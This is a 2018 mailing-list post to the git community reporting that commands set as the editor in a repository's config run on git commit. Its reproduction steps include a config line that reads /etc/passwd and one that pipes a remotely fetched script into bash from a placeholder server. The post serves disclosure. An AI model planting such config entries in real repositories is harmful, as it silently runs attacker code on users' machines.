Git vulnerability - execution of arbitrary code through .git/conf

Leo Silva (a.k.a kirotawa) Sat, 25 Aug 2018 19:14:20 -0700

Hi git community!

I found what seems to be a vulnerability/bug on git. I'm running
version 2.7.4 on Ubuntu xenial, but also tested with last version
2.19.0.rc0.2.g29d9e3e.


The steps to reproduce are:

1. open your .git/conf
2. add something like:
[core]
    editor = ls /etc/passwd
or even
    editor = curl -s http://server/path/malicious-script.sh | bash -s
3. run: git commit

A malicious user/repo can set some code through URL or even as command
in .git/conf and take control of your machine or silently run
malicious code.

[]'s
-- 

----------------------------------------------
Leônidas S. Barbosa (Kirotawa)
blog: corecode.wordpress.com
---------------------------------------------

"O que importa são os incontáveis pequenos atos de pessoas
desconhecidas, que fundam as bases para os eventos significativos que
se tornam história" - Howard Zinn

Git vulnerability - execution of arbitrary code through .git/conf

Reply via email to